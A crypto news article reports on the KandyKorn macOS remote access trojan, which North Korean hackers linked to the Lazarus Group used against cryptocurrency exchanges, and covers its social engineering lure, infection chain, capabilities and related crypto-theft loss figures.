Search
Search
North Korean Hachers Target Apple

North Korean Hackers Hit Apple and Crypto Exchanges with macOS Malware

195 Listen to this article Cybersecurity Alert: macOS Malware “KandyKorn” in Circulation North Korean hacking entities, believed to be associated […]

Latest News

Listen to this article

Cybersecurity Alert: macOS Malware “KandyKorn” in Circulation

North Korean hacking entities, believed to be associated with the well-known Lazarus Group, have been actively targeting cryptocurrency exchanges, deploying a new strain of macOS malware known as KandyKorn. The attackers have been reported to impersonate blockchain engineers on popular platforms like Discord to lure their victims.

Ingenious Social Engineering Tactics

Elastic Security Labs, a cybersecurity research firm, has uncovered that these cybercriminals use advanced social engineering tactics. They trick unsuspecting victims into downloading a ZIP file containing the malware, disguised as a cryptocurrency arbitrage bot, a tool designed to take advantage of price differences between exchanges.

Watcher.py: The Trigger for KandyKorn

The initial infection starts with the victim downloading a Python file, which subsequently downloads and executes Watcher.py. This script is the gateway to the infection chain known as REF7001, leading to the execution of the KandyKorn malware.

Capabilities of the KandyKorn RAT

KandyKorn operates as a remote access trojan (RAT) and a backdoor. It boasts a variety of malicious capabilities, including data exfiltration, executing directory listings, secure file deletion, and managing file uploads and downloads.

Read Also:  Experts Have to Say That Bitcoin Has Made a New Foundation for Hitting Its New Record Know Why?

Stealthy Communication Tactics

The Elastic researchers noted that KandyKorn stands out for its communication protocol with its command-and-control (C2) server. The malware awaits commands rather than continuously polling for them, which reduces its footprint and chances of being detected.

Ongoing Threat Activity Since April 2023

The malware campaign is believed to have commenced in April 2023 and remains active. The cybercriminals continue to refine their tools and techniques, with RC4 key encryption for KandyKorn C2 and Sugarloader being the latest developments.

Rising Concerns Over Cryptocurrency Exchange Security

This latest attack vector reiterates that macOS users are not immune to sophisticated malware campaigns, especially in the lucrative cryptocurrency sector. The Money Mongers, an independent think tank, has reported significant losses in the crypto industry due to such cyber attacks, with a staggering $12.36 billion lost since 2011.

A Yearly Snapshot of Crypto Hacks

According to their data, 297 crypto-related hacking incidents have occurred this year alone, translating to an industry loss of approximately $216,000 every hour. Chainalysis’s reports highlight 2022 as the most detrimental year for crypto businesses, with losses summing up to $3.8 billion due to hacks.

Record-Breaking Thefts by the Lazarus Group

Notably, the Lazarus Group, reputedly backed by the North Korean government, has been implicated in the theft of an extraordinary $1.7 billion in cryptocurrencies across various hacking operations, setting a new record for the group’s criminal activities.

Enhanced Security Measures: A Call to Action

The findings by The Money Mongers underscore an urgent call for fortified security measures within the cryptocurrency domain. As the threat landscape evolves, so too must the industry’s defense mechanisms to safeguard against these increasingly sophisticated cyber threats.

Read Also:  Binance Meme: Unraveling the Influence of Binance in the Memecoin Landscape

For the Latest Crypto News follow the Coinography and Subscribe our YouTube channel or follow us on social media platforms like Twitter, Facebook, Instagram and LinkedIn.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Get Latest Updates

Latest News

Web Stories

Latest News

0
Would love your thoughts, please comment.x
()
x
Scroll to Top
Shiba Inu Burn Spike Raises Price Over 1300% Impact Concerns GBTC ETF Hindering Bitcoin’s Path to $100,000 Bitcoin News Ethereum Futures ETF with 2x Leverage Filed by Defiance Pump.Fun Boosts Memecoin Market: $5.2M in 38 Days Charles Hoskinson Highlights Cardano’s Progress Despite Criticism Solana DEX Booms, InQubeta Presale Tops $13M Cryptocurrencies to Watch: 16 Promising Options for 2024 Crypto AI Trading Bots: Best Picks for 2024 Cardano’s Top 5 Tokens for April 2024 Investment Crypto Highlights: 12 Best Bitcoin and Crypto Casinos for 2024 Solana (SOL) Meme Coins Lead the Way in Current Rally Bitcoin Runes Heading to Magic Eden Post Ordinals Bet Success Dogwifhat (WIF) Climbs to 3rd Spot, Tops PEPE at $4 Coinbase Announces Exciting New Altcoin Listings Altcoin Picks: 3 Hidden Gems to Watch Out for in April Binance Won’t Go Bankrupt Even if All Users Initiate Withdrawals: CZ What is the difference between Crypto and Bitcoin? Discover 5 Top Meme Coins to Consider in 2024 Binance Access Blocked in Philippines Over Unlicensed Operations 15 Best Crypto Presales to Invest In For 2024